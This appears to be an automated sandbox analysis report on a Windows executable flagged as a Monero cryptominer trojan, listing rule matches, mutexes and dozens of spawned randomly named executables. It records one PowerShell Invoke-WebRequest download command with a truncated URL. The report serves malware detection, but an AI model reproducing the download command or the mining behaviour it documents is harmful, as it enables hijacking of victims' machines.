Source: 8.2.bJVoOik.exe.7ff6b3cd0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 18.2.hAOVVjq.exe.7ff77b680000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 36.2.sabRErB.exe.7ff795f20000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 33.2.LKurWpq.exe.7ff650b90000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.mbSqRHL.exe.7ff62c3e0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 23.2.sdTevgk.exe.7ff601280000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@4779/516@4/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dark-9c5b7a476542[1].css

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
Source: C:\Users\user\Desktop\file.exe	Mutant created: \Sessions\1\BaseNamedObjects\sfdkjjhgkdsfhgjkjjsd

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvboery0.1r2.ps1

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 92%

Source: xIpouRJ.exe	String found in binary or memory: --help
Source: xIpouRJ.exe	String found in binary or memory: --help
Source: ERbKWDm.exe	String found in binary or memory: --help
Source: ERbKWDm.exe	String found in binary or memory: --help
Source: wHnuprt.exe	String found in binary or memory: --help
Source: wHnuprt.exe	String found in binary or memory: --help
Source: uxMRJKa.exe	String found in binary or memory: --help
Source: uxMRJKa.exe	String found in binary or memory: --help
Source: bJVoOik.exe	String found in binary or memory: --help
Source: bJVoOik.exe	String found in binary or memory: --help
Source: wkazDeV.exe	String found in binary or memory: --help
Source: wkazDeV.exe	String found in binary or memory: --help
Source: VWrcuzM.exe	String found in binary or memory: --help
Source: VWrcuzM.exe	String found in binary or memory: --help

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\xIpouRJ.exe C:\Windows\System\xIpouRJ.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\ERbKWDm.exe C:\Windows\System\ERbKWDm.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\wHnuprt.exe C:\Windows\System\wHnuprt.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\uxMRJKa.exe C:\Windows\System\uxMRJKa.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\bJVoOik.exe C:\Windows\System\bJVoOik.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\wkazDeV.exe C:\Windows\System\wkazDeV.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\VWrcuzM.exe C:\Windows\System\VWrcuzM.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\wJNkgSa.exe C:\Windows\System\wJNkgSa.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\imwRXsl.exe C:\Windows\System\imwRXsl.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\bzSbRdi.exe C:\Windows\System\bzSbRdi.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\Csmwgyb.exe C:\Windows\System\Csmwgyb.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\defQfgC.exe C:\Windows\System\defQfgC.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\XZxtJFw.exe C:\Windows\System\XZxtJFw.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\MwFvbxc.exe C:\Windows\System\MwFvbxc.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\hAOVVjq.exe C:\Windows\System\hAOVVjq.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\oxCQuSo.exe C:\Windows\System\oxCQuSo.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\vyHGCnK.exe C:\Windows\System\vyHGCnK.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\mbSqRHL.exe C:\Windows\System\mbSqRHL.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\VFkciqc.exe C:\Windows\System\VFkciqc.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\sdTevgk.exe C:\Windows\System\sdTevgk.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\eVVPPqR.exe C:\Windows\System\eVVPPqR.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\VHwkuIa.exe C:\Windows\System\VHwkuIa.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\WLWcTVM.exe C:\Windows\System\WLWcTVM.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\WCbcoxD.exe C:\Windows\System\WCbcoxD.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\QWtCxan.exe C:\Windows\System\QWtCxan.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\fpHmIIc.exe C:\Windows\System\fpHmIIc.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\FGSooXz.exe C:\Windows\System\FGSooXz.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\mKdsHiQ.exe C:\Windows\System\mKdsHiQ.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\nWSykjl.exe C:\Windows\System\nWSykjl.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\LKurWpq.exe C:\Windows\System\LKurWpq.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\iHSYLud.exe C:\Windows\System\iHSYLud.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\tyQdqmC.exe C:\Windows\System\tyQdqmC.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\sabRErB.exe C:\Windows\System\sabRErB.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\ZTSJHKb.exe C:\Windows\System\ZTSJHKb.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\xNhRSWh.exe C:\Windows\System\xNhRSWh.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\jtnQpnb.exe C:\Windows\System\jtnQpnb.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\hEUEsIC.exe C:\Windows\System\hEUEsIC.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\UqXZtcb.exe C:\Windows\System\UqXZtcb.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\xIpouRJ.exe C:\Windows\System\xIpouRJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\ERbKWDm.exe C:\Windows\System\ERbKWDm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\wHnuprt.exe C:\Windows\System\wHnuprt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\uxMRJKa.exe C:\Windows\System\uxMRJKa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\bJVoOik.exe C:\Windows\System\bJVoOik.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\wkazDeV.exe C:\Windows\System\wkazDeV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\VWrcuzM.exe C:\Windows\System\VWrcuzM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\wJNkgSa.exe C:\Windows\System\wJNkgSa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\imwRXsl.exe C:\Windows\System\imwRXsl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\bzSbRdi.exe C:\Windows\System\bzSbRdi.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\Csmwgyb.exe C:\Windows\System\Csmwgyb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\defQfgC.exe C:\Windows\System\defQfgC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\XZxtJFw.exe C:\Windows\System\XZxtJFw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\MwFvbxc.exe C:\Windows\System\MwFvbxc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\hAOVVjq.exe C:\Windows\System\hAOVVjq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\oxCQuSo.exe C:\Windows\System\oxCQuSo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\vyHGCnK.exe C:\Windows\System\vyHGCnK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\mbSqRHL.exe C:\Windows\System\mbSqRHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\VFkciqc.exe C:\Windows\System\VFkciqc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\sdTevgk.exe C:\Windows\System\sdTevgk.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\eVVPPqR.exe C:\Windows\System\eVVPPqR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\VHwkuIa.exe C:\Windows\System\VHwkuIa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\WLWcTVM.exe C:\Windows\System\WLWcTVM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\WCbcoxD.exe C:\Windows\System\WCbcoxD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\QWtCxan.exe C:\Windows\System\QWtCxan.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\fpHmIIc.exe C:\Windows\System\fpHmIIc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\FGSooXz.exe C:\Windows\System\FGSooXz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\mKdsHiQ.exe C:\Windows\System\mKdsHiQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\nWSykjl.exe C:\Windows\System\nWSykjl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\LKurWpq.exe C:\Windows\System\LKurWpq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\iHSYLud.exe C:\Windows\System\iHSYLud.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\tyQdqmC.exe C:\Windows\System\tyQdqmC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\sabRErB.exe C:\Windows\System\sabRErB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\ZTSJHKb.exe C:\Windows\System\ZTSJHKb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\xNhRSWh.exe C:\Windows\System\xNhRSWh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\jtnQpnb.exe C:\Windows\System\jtnQpnb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\hEUEsIC.exe C:\Windows\System\hEUEsIC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System\UqXZtcb.exe C:\Windows\System\UqXZtcb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
